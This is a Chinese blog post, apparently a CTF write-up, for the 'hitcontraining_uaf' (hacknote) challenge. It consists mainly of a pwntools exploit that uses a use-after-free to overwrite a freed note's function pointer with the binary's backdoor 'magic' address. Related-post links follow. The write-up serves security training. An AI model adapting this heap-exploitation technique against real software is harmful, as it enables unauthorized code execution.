hitcontraining_uaf[use after free]

系统管理员 2023-02-22 08:27 51阅读 0赞

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70]  
比较简单，直接留了后门！  
exp

from pwn import *
    
    context.log_level = 'debug'
    
    def pause_debug():
        log.info(proc.pidof(p))
        pause()
    
    def add_note(size, context):
        p.sendlineafter('choice :', str(1))
        p.sendlineafter('size :', str(size))
        p.sendafter('Content :', context)
    
    def delete_note(idx):
        p.sendlineafter('choice :', str(2))
        p.sendlineafter('Index :', str(idx))
    
    def print_note(idx):
        p.sendlineafter('choice :', str(3))
        p.sendlineafter('Index :', str(idx))
    
    proc_name = './hacknote'
    p = process(proc_name)
    # p = remote('node3.buuoj.cn', 27556) 
    elf = ELF(proc_name)
    magic_addr = elf.sym['magic']
    add_note(0x16, b'a') # 0 
    add_note(0x16, b'a') # 1 
    delete_note(0)
    delete_note(1)
    add_note(0x8, p32(magic_addr)) # 2 0
    print_note(0)
    p.interactive()

![在这里插入图片描述][20200702185627851.png]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70]: https://img-blog.csdnimg.cn/20200702143454681.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg==,size_16,color_FFFFFF,t_70
[20200702185627851.png]: https://img-blog.csdnimg.cn/20200702185627851.png

发表评论取消回复

表情：

评论列表（有 0 条评论，51人围观）

还没有评论，来说两句吧...

相关阅读

相关解决to the cache because there was insufficient free space available after evict

目录解决 "to the cache because there was insufficient free space available after eviction"

骑猪看日落/ 2023年10月17日 09:04/ 0 赞/ 95 阅读

相关 free()

c语言中经常需要给指针变量分配内存空间，需要用到一组函数： malloc（）和free（）使用的时候需要包含头文件stdlib.h malloc（）比较好理解，主

╰半夏微凉°/ 2023年06月04日 13:54/ 0 赞/ 41 阅读

相关 hitcontraining_uaf[use after free]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

系统管理员/ 2023年02月22日 08:27/ 0 赞/ 52 阅读

相关 [BJDCTF 2nd]ydsneedgirlfriend2[use after free]

![在这里插入图片描述][20200626171146938.png] 有符号表，而且直接留了后门！ ![在这里插入图片描述][watermark_type_ZmFuZ

分手后的思念是犯贱/ 2023年02月20日 12:09/ 0 赞/ 5 阅读

相关 uaf漏洞利用、use after free

UAF学习–原理及利用： [https://www.cnblogs.com/alert123/p/4918041.html][https_www.cnblogs.com_a

迷南。/ 2022年12月30日 07:47/ 0 赞/ 142 阅读

相关 free命令

free命令可以显示Linux系统中空闲的、已用的物理内存及swap内存,及被内核使用的buffer。在Linux系统监控的工具中，free命令是最经常使用的命令之一。 1．

太过爱你忘了你带给我的痛/ 2022年09月17日 14:20/ 0 赞/ 233 阅读

相关 Fastbin 堆溢出 Use After Free

shell 地址 ![1][] -- coding: utf-8 -- from pwn import elf = ELF('./f

悠悠/ 2022年09月14日 08:52/ 0 赞/ 52 阅读

相关 Fastbin 堆溢出 Use After Free

shell 地址 ![1][] -- coding: utf-8 -- from pwn import elf = ELF('./f

爱被打了一巴掌/ 2022年08月28日 11:00/ 0 赞/ 36 阅读

相关 because there was insufficient free space available after evicting expired cache entries

tomcat8启动时报一下错误 ![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLm

r囧r小猫/ 2021年10月01日 07:48/ 0 赞/ 673 阅读

相关 Free

Free无论是译作“自由”还是“免费”对于使用者来说似乎都有好处，但当自己处于开发者或开发厂商的角度，可能就是“双重标准”了，毕竟没有几个人能像Linus那样Just F...

小灰灰/ 2021年01月08日 14:04/ 0 赞/ 487 阅读